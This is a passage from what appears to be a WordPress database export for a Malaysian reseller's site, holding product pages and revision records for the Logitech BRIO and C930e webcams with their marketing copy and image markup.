zoom.</p><h3>LOOK GREAT IN ANY LIGHT</h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition â€“ and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLightâ„¢ 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SECURITY MEETS CONVENIENCE</h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIOâ€™s lens to login.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>ADJUSTABLE FIELD OF VIEW</h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.</p><h4>4K RECORDING</h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.</p><h4>SMOOTH STREAMING</h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.</p><h4>CERTIFIED FOR BUSINESS</h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabberâ„¢, works with Microsoft CortanaÂ®, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with BRIO.</p><h4>MOUNTING &amp; PRIVACY OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.</p><h4>5X HD ZOOM</h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIOâ€™s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.</p><h4>CAMERA SETTINGS</h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.</p>','Logitech BRIO','','publish','closed','closed','','logitech-brio','','','2019-03-04 16:49:03','2019-03-04 08:49:03','',0,'https://bintara.com.my/?page_id=2987',0,'page','',0),(2988,1,'2019-03-04 16:03:08','2019-03-04 08:03:08','','Logitech BRIO','','inherit','closed','closed','','2987-revision-v1','','','2019-03-04 16:03:08','2019-03-04 08:03:08','',2987,'https://bintara.com.my/blog/2019/03/04/2987-revision-v1/',0,'revision','',0),(2989,1,'2019-03-04 16:06:10','2019-03-04 08:06:10','','u4.png','','inherit','closed','closed','','u4-png','','','2019-03-04 16:06:10','2019-03-04 08:06:10','',0,'https://bintara.com.my/wp-content/uploads/2019/03/u4.png',0,'attachment','image/png',0),(2990,1,'2019-03-04 16:07:12','2019-03-04 08:07:12','','briopictograms (1)','','inherit','closed','closed','','briopictograms-1','','','2019-03-04 16:07:12','2019-03-04 08:07:12','',2987,'https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png',0,'attachment','image/png',0),(2992,1,'2019-03-04 16:33:54','2019-03-04 08:33:54','','briopictograms (1)','','inherit','closed','closed','','briopictograms-1-2','','','2019-03-04 16:33:54','2019-03-04 08:33:54','',2987,'https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg',0,'attachment','image/jpeg',0),(2993,1,'2019-03-04 16:37:07','2019-03-04 08:37:07','','briopictograms','','inherit','closed','closed','','briopictograms-2','','','2019-03-04 16:37:07','2019-03-04 08:37:07','',2987,'https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg',0,'attachment','image/jpeg',0),(2994,1,'2019-03-04 16:38:08','2019-03-04 08:38:08','','briopictograms (2)','','inherit','closed','closed','','briopictograms-2-2','','','2019-03-04 16:38:08','2019-03-04 08:38:08','',2987,'https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg',0,'attachment','image/jpeg',0),(2995,1,'2019-03-04 16:43:17','2019-03-04 08:43:17','<h2>LOGITECH BRIO</h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording</p><ul><li>Spectacular video quality up to 4K</li><li>Look great in any light with HDR and RightLightâ„¢ 3</li><li>Enhanced security with Windows Helloâ„¢</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A NEW BENCHMARK FOR WEBCAMS</h2><p>Step up to the worldâ€™s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLightâ„¢ 3.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>CAPTURE EVERY DETAIL IN 4K HD</h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x zoom.</p><h3>LOOK GREAT IN ANY LIGHT</h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition â€“ and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLightâ„¢ 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SECURITY MEETS CONVENIENCE</h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIOâ€™s lens to login.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>ADJUSTABLE FIELD OF VIEW</h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.</p><h4>4K RECORDING</h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.</p><h4>SMOOTH STREAMING</h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.</p><h4>CERTIFIED FOR BUSINESS</h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabberâ„¢, works with Microsoft CortanaÂ®, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with BRIO.</p><h4>MOUNTING &amp; PRIVACY OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.</p><h4>5X HD ZOOM</h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIOâ€™s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.</p><h4>CAMERA SETTINGS</h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.</p>','Logitech BRIO','','inherit','closed','closed','','2987-revision-v1','','','2019-03-04 16:43:17','2019-03-04 08:43:17','',2987,'https://bintara.com.my/blog/2019/03/04/2987-revision-v1/',0,'revision','',0),(2996,1,'2019-03-04 16:48:19','2019-03-04 08:48:19','<h2>LOGITECH BRIO</h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording</p><ul><li>Spectacular video quality up to 4K</li><li>Look great in any light with HDR and RightLightâ„¢ 3</li><li>Enhanced security with Windows Helloâ„¢</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>A NEW BENCHMARK FOR WEBCAMS</h2><p>Step up to the worldâ€™s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLightâ„¢ 3.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>CAPTURE EVERY DETAIL IN 4K HD</h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x zoom.</p><h3>LOOK GREAT IN ANY LIGHT</h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition â€“ and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLightâ„¢ 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SECURITY MEETS CONVENIENCE</h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIOâ€™s lens to login.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>ADJUSTABLE FIELD OF VIEW</h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.</p><h4>4K RECORDING</h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.</p><h4>SMOOTH STREAMING</h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.</p><h4>CERTIFIED FOR BUSINESS</h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabberâ„¢, works with Microsoft CortanaÂ®, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with BRIO.</p><h4>MOUNTING &amp; PRIVACY OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.</p><h4>5X HD ZOOM</h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIOâ€™s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.</p><h4>CAMERA SETTINGS</h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.</p>','Logitech BRIO','','inherit','closed','closed','','2987-revision-v1','','','2019-03-04 16:48:19','2019-03-04 08:48:19','',2987,'https://bintara.com.my/blog/2019/03/04/2987-revision-v1/',0,'revision','',0),(2997,1,'2019-03-04 16:49:03','2019-03-04 08:49:03','<h2>LOGITECH BRIO</h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording</p><ul><li>Spectacular video quality up to 4K</li><li>Look great in any light with HDR and RightLightâ„¢ 3</li><li>Enhanced security with Windows Helloâ„¢</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>A NEW BENCHMARK FOR WEBCAMS</h2><p>Step up to the worldâ€™s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLightâ„¢ 3.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>CAPTURE EVERY DETAIL IN 4K HD</h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x zoom.</p><h3>LOOK GREAT IN ANY LIGHT</h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition â€“ and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLightâ„¢ 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SECURITY MEETS CONVENIENCE</h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIOâ€™s lens to login.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>ADJUSTABLE FIELD OF VIEW</h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.</p><h4>4K RECORDING</h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.</p><h4>SMOOTH STREAMING</h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.</p><h4>CERTIFIED FOR BUSINESS</h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabberâ„¢, works with Microsoft CortanaÂ®, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with BRIO.</p><h4>MOUNTING &amp; PRIVACY OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.</p><h4>5X HD ZOOM</h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIOâ€™s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.</p><h4>CAMERA SETTINGS</h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.</p>','Logitech BRIO','','inherit','closed','closed','','2987-revision-v1','','','2019-03-04 16:49:03','2019-03-04 08:49:03','',2987,'https://bintara.com.my/blog/2019/03/04/2987-revision-v1/',0,'revision','',0),(2999,1,'2019-03-04 16:53:49','2019-03-04 08:53:49','<h2>LOGITECH C930E</h2><p>Business webcam with a wide field of view and HD digital zoom</p><ul><li>1080p HD quality, ideal for video conferencing</li><li>Excellent low-light performance with RightLightâ„¢ 2</li><li>Premium glass lens with autofocus</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>A WEBCAM THAT MEANS BUSINESS</h2><p>Experience video calls that are the next best thing to being there in person. Sophisticated technology in the Logitech C930e Webcam delivers clear video and sound in virtually any environment, even low-light conditions. With 1080p resolution, H.264 video compression and a wide 90-degree field of view, C930e offers advanced webcam capabilities for superior video conferencing.</p>		\n			<h4>KEY FEATURES</h4>		\n		<h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C930e Webcam features 90-degree field of view, pan, tilt, and 4x digital zoom, allowing you to adjust the frame to fit your environment. RightLightâ„¢ 2 Technology and a precision lens provide sharp video even in low-light conditions.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h4>HIGH QUALITY, LOW BANDWIDTH</h4><p>Raise meeting productivity with remarkably clear video at all times â€“ even when bandwidth is limited. Optimized for Skype for Business, the C930e Webcam supports H.264 with Scalable Video Coding and UVC 1.5 encoding to minimize its dependence on computer and network resources.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>WIDE FIELD OF VIEW</h4><p>With a generous, 90-degree field of view, C930e can capture teams and whiteboards with ease.</p><h4>4X HD ZOOM</h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. The premium image sensor delivers HD quality without jaggies or blur, even when zoomed in.</p><h4>MOUNTING &amp; PRIVACY OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C930e on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.</p><h4>CAMERA SETTINGS</h4><p>Customize your C930e and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.</p>','Logitech C930E','','publish','closed','closed','','logitech-c930e','','','2019-03-04 17:42:37','2019-03-04 09:42:37','',0,'https://bintara.com.my/?page_id=2999',0,'page','',0),(3000,1,'2019-03-04 16:53:49','2019-03-04 08:53:49','','Logitech C930E','','inherit','closed','closed','','2999-revision-v1','','','2019-03-04 16:53:49','2019-03-04 08:53:49','',2999,'https://bintara.com.my/blog/2019/03/04/2999-revision-v1/',0,'revision','',0),(3002,1,'2019-03-04 17:01:41','2019-03-04 09:01:41','','c930e-webcam (1)','','inherit','closed','closed','','c930e-webcam-1','','','2019-03-04 17:01:41','2019-03-04 09:01:41','',2999,'https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.png',0,'attachment','image/png',0),(3003,1,'2019-03-04 17:25:20','2019-03-04 09:25:20','','c930e-webcam','','inherit','closed','closed','','c930e-webcam-2','','','2019-03-04 17:25:20','2019-03-04 09:25:20','',2999,'https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam.jpg',0,'attachment','image/jpeg',0),(3004,1,'2019-03-04 17:27:01','2019-03-04 09:27:01','','c930e-webcam (1)','','inherit','closed','closed','','c930e-webcam-1-2','','','2019-03-04 17:27:01','2019-03-04 09:27:01','',2999,'https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.jpg',0,'attachment','image/jpeg',0),(3005,1,'2019-03-04 17:40:44','2019-03-04 09:40:44','<h2>LOGITECH C930E</h2><p>Business webcam with a wide field of view and HD digital zoom</p><ul><li>1080p HD quality, ideal for video conferencing</li><li>Excellent low-light performance with RightLightâ„¢ 2</li><li>Premium glass lens with autofocus</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>A WEBCAM THAT MEANS BUSINESS</h2><p>Experience video calls that are the next best thing to being there in person. Sophisticated technology in the Logitech C930e Webcam delivers clear video and sound in virtually any environment, even low-light conditions. With 1080p resolution, H.264 video compression and a wide 90-degree field of view, C930e offers advanced webcam capabilities for superior video conferencing.</p>		\n			<h4>KEY FEATURES</h4>		\n		<h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C930e Webcam features 90-degree field of view, pan, tilt, and 4x digital zoom, allowing you to adjust the frame to fit your environment. RightLightâ„¢ 2 Technology and a precision lens provide sharp video even in low-light conditions.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h4>HIGH QUALITY, LOW BANDWIDTH</h4><p>Raise meeting productivity with remarkably clear video at all times â€“ even when bandwidth is limited. Optimized for Skype for Business, the C930e Webcam supports H.264 with Scalable Video Coding and UVC 1.5 encoding to minimize its dependence on computer and network resources.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>WIDE FIELD OF VIEW</h4><p>With a generous, 90-degree field of view, C930e can capture teams and whiteboards with ease.</p><h4>4X HD ZOOM</h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. The premium image sensor delivers HD quality without jaggies or blur, even when zoomed in.</p><h4>MOUNTING &amp; PRIVACY OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C930e on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.</p><h4>CAMERA SETTINGS</h4><p>Customize your C930e and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.</p>','Logitech C930E','','inherit','closed','closed','','2999-revision-v1','','','2019-03-04 17:40:44','2019-03-04 09:40:44','',2999,'https://bintara.com.my/blog/2019/03/04/2999-revision-v1/',0,'revision','',0),(3006,1,'2019-03-04 17:42:37','2019-03-04 09:42:37','<h2>LOGITECH C930E</h2><p>Business webcam with a wide field of view and HD digital zoom</p><ul><li>1080p HD quality, ideal for video conferencing</li><li>Excellent low-light performance with RightLightâ„¢ 2</li><li>Premium glass lens with autofocus</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>A WEBCAM THAT MEANS BUSINESS</h2><p>Experience video calls that are the next best thing to being there in person. Sophisticated technology in the Logitech C930e Webcam delivers clear video and sound in virtually any environment, even low-light conditions. With 1080p resolution, H.264 video compression and a wide 90-degree field of view, C930e offers advanced webcam capabilities for superior video conferencing.</p>		\n			<h4>KEY FEATURES</h4>		\n		<h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C930e Webcam features 90-degree field of view, pan, tilt, and 4x digital zoom, allowing you to adjust the frame to fit your environment. RightLightâ„¢ 2 Technology and a precision lens provide sharp video even in low-light conditions.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c930e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h4>HIGH QUALITY, LOW BANDWIDTH</h4><p>Raise meeting productivity with remarkably clear video at all times â€“ even when bandwidth is limited. Optimized for Skype for Business, the C930e Webcam supports H.264 with Scalable Video Coding and UVC 1.5 encoding to minimize its dependence on computer and network resources.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>WIDE FIELD OF VIEW</h4><p>With a generous, 90-degree field of view, C930e can capture teams and whiteboards with 